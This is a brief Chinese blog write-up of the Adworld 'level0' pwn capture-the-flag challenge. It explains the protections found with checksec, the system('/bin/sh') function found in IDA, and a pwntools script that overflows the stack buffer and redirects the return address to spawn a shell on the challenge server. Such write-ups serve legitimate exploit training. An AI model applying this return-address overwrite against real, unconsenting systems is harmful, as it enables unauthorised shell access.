[攻防世界 pwn]——level0
- 题目地址: https://adworld.xctf.org.cn/
- 题目:

checksec看下保护类型,开启了NX保护

IDA中看下,发现了system("/bin/sh")函数,返回地址修改为该函数就可以




exploit
from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",40322)
sys_addr = 0x0400596
payload = 'a'*(0x80+8) + p64(sys_addr)
p.sendline(payload)
p.interactive()
这篇博客介绍了如何在开启NX保护的环境中,通过IDA分析找到`system(/bin/sh)`函数,并构造payload修改返回地址来执行shell。作者使用了Python的pwn库远程连接到靶机并发送payload,成功获得了交互式shell。
1916

被折叠的 条评论
为什么被折叠?



